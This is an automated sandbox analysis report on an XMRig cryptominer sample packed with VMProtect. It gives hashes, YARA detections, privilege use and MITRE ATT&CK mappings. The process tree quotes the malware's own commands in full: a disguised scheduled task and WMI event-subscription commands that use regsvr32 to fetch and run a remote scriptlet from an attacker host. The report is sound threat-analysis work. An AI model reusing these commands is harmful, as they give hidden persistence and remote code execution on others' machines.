xmrig | cccdcd65247b27e1d3587cc6d365a5dd703954ec578f288ccf2c97b85837b069

Analysis

max time kernel
146s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
26/05/2024, 11:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe
Size

348KB
MD5

75497caaa52797d58a70cdbe1cb1252c
SHA1

a3ee3f7b8940dfadfc728b7467679879640f9578
SHA256

cccdcd65247b27e1d3587cc6d365a5dd703954ec578f288ccf2c97b85837b069
SHA512

f3f9ab4f058af45f4b148433f565fa1d602339b52cca84ea8dd1dc1ef59c1c7050cf04421a77dd557e81ddf316a5177ff89bfafb50de5f26d7ca85289b50d2d6
SSDEEP

6144:FbF9t7qqDX+ZUMPyc0vcDDleaLDnKVaG1S/YNe7Y:5D4qr+SMPGv2DleaLDnKkG1fl

Score

10^/10

xmrig miner vmprotect

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 3 IoCs

miner

resource	yara_rule
behavioral2/memory/4424-0-0x00007FF72C450000-0x00007FF72C50C000-memory.dmp	xmrig
behavioral2/memory/4424-1-0x00007FF72C450000-0x00007FF72C50C000-memory.dmp	xmrig
behavioral2/memory/4424-4-0x00007FF72C450000-0x00007FF72C50C000-memory.dmp	xmrig

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral2/memory/4424-0-0x00007FF72C450000-0x00007FF72C50C000-memory.dmp	vmprotect
behavioral2/memory/4424-1-0x00007FF72C450000-0x00007FF72C50C000-memory.dmp	vmprotect
behavioral2/memory/4424-4-0x00007FF72C450000-0x00007FF72C50C000-memory.dmp	vmprotect

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4388	SchTasks.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	8	wmic.exe
Token: SeSecurityPrivilege	8	wmic.exe
Token: SeTakeOwnershipPrivilege	8	wmic.exe
Token: SeLoadDriverPrivilege	8	wmic.exe
Token: SeSystemProfilePrivilege	8	wmic.exe
Token: SeSystemtimePrivilege	8	wmic.exe
Token: SeProfSingleProcessPrivilege	8	wmic.exe
Token: SeIncBasePriorityPrivilege	8	wmic.exe
Token: SeCreatePagefilePrivilege	8	wmic.exe
Token: SeBackupPrivilege	8	wmic.exe
Token: SeRestorePrivilege	8	wmic.exe
Token: SeShutdownPrivilege	8	wmic.exe
Token: SeDebugPrivilege	8	wmic.exe
Token: SeSystemEnvironmentPrivilege	8	wmic.exe
Token: SeRemoteShutdownPrivilege	8	wmic.exe
Token: SeUndockPrivilege	8	wmic.exe
Token: SeManageVolumePrivilege	8	wmic.exe
Token: 33	8	wmic.exe
Token: 34	8	wmic.exe
Token: 35	8	wmic.exe
Token: 36	8	wmic.exe
Token: SeIncreaseQuotaPrivilege	3500	wmic.exe
Token: SeSecurityPrivilege	3500	wmic.exe
Token: SeTakeOwnershipPrivilege	3500	wmic.exe
Token: SeLoadDriverPrivilege	3500	wmic.exe
Token: SeSystemProfilePrivilege	3500	wmic.exe
Token: SeSystemtimePrivilege	3500	wmic.exe
Token: SeProfSingleProcessPrivilege	3500	wmic.exe
Token: SeIncBasePriorityPrivilege	3500	wmic.exe
Token: SeCreatePagefilePrivilege	3500	wmic.exe
Token: SeBackupPrivilege	3500	wmic.exe
Token: SeRestorePrivilege	3500	wmic.exe
Token: SeShutdownPrivilege	3500	wmic.exe
Token: SeDebugPrivilege	3500	wmic.exe
Token: SeSystemEnvironmentPrivilege	3500	wmic.exe
Token: SeRemoteShutdownPrivilege	3500	wmic.exe
Token: SeUndockPrivilege	3500	wmic.exe
Token: SeManageVolumePrivilege	3500	wmic.exe
Token: 33	3500	wmic.exe
Token: 34	3500	wmic.exe
Token: 35	3500	wmic.exe
Token: 36	3500	wmic.exe
Token: SeIncreaseQuotaPrivilege	3400	wmic.exe
Token: SeSecurityPrivilege	3400	wmic.exe
Token: SeTakeOwnershipPrivilege	3400	wmic.exe
Token: SeLoadDriverPrivilege	3400	wmic.exe
Token: SeSystemProfilePrivilege	3400	wmic.exe
Token: SeSystemtimePrivilege	3400	wmic.exe
Token: SeProfSingleProcessPrivilege	3400	wmic.exe
Token: SeIncBasePriorityPrivilege	3400	wmic.exe
Token: SeCreatePagefilePrivilege	3400	wmic.exe
Token: SeBackupPrivilege	3400	wmic.exe
Token: SeRestorePrivilege	3400	wmic.exe
Token: SeShutdownPrivilege	3400	wmic.exe
Token: SeDebugPrivilege	3400	wmic.exe
Token: SeSystemEnvironmentPrivilege	3400	wmic.exe
Token: SeRemoteShutdownPrivilege	3400	wmic.exe
Token: SeUndockPrivilege	3400	wmic.exe
Token: SeManageVolumePrivilege	3400	wmic.exe
Token: 33	3400	wmic.exe
Token: 34	3400	wmic.exe
Token: 35	3400	wmic.exe
Token: 36	3400	wmic.exe
Token: SeLockMemoryPrivilege	4424	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4424 wrote to memory of 4388	4424	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	83
PID 4424 wrote to memory of 4388	4424	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	83
PID 4424 wrote to memory of 8	4424	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	84
PID 4424 wrote to memory of 8	4424	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	84
PID 4424 wrote to memory of 3400	4424	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	85
PID 4424 wrote to memory of 3400	4424	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	85
PID 4424 wrote to memory of 3500	4424	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	86
PID 4424 wrote to memory of 3500	4424	75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe	86

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\75497caaa52797d58a70cdbe1cb1252c_JaffaCakes118.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4424
- C:\Windows\SYSTEM32\SchTasks.exe
  SchTasks.exe /Create /SC MINUTE /TN WindowsUpdateInternel /TR "regsvr32 /s /n /u /i:http://down.cacheoffer.tk/d2/reg9.sct scrobj.dll" /MO 5 /F
  2⤵
  - Creates scheduled task(s)
  PID:4388
- C:\Windows\System32\Wbem\wmic.exe
  wmic /NAMESPACE:"\\\root\subscription" PATH __EventFilter CREATE Name="H888", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_PerfFormattedData_PerfOS_System" AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:8
- C:\Windows\System32\Wbem\wmic.exe
  wmic /NAMESPACE:"\\\root\subscription" PATH CommandLineEventConsumer CREATE Name="H999", CommandLineTemplate="regsvr32 /s /n /u /i:http://down.cacheoffer.tk/d2/reg9.sct scrobj.dll"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3400
- C:\Windows\System32\Wbem\wmic.exe
  wmic /NAMESPACE:"\\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"H888\"", Consumer="CommandLineEventConsumer.Name=\"H999\""
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3500

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:3164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4424-0-0x00007FF72C450000-0x00007FF72C50C000-memory.dmp

Filesize
752KB

Download
memory/4424-1-0x00007FF72C450000-0x00007FF72C50C000-memory.dmp

Filesize
752KB

Download
memory/4424-4-0x00007FF72C450000-0x00007FF72C50C000-memory.dmp

Filesize
752KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads